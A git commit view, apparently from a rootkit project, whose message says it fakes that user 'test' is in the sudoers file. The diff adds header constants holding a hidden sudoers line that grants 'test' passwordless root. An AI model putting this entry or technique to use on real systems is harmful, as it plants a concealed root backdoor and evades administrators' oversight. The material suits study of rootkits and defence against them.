Completed faking that an user is in the sudoers file. Now user 'test' can use sudo without being there

This commit is contained in:
h3xduck
2022-02-05 14:10:12 -05:00
parent 643783004a
commit 41ef733520
5 changed files with 1378 additions and 1251 deletions

View File

@@ -15,5 +15,7 @@
#define STRING_FS_SUDO_TASK_LEN 5
#define STRING_FS_SUDOERS_FILE "/etc/sudoers"
#define STRING_FS_SUDOERS_FILE_LEN 13
#define STRING_FS_SUDOERS_ENTRY "test ALL=(ALL:ALL) NOPASSWD:ALL #"
#define STRING_FS_SUDOERS_ENTRY_LEN 34
#endif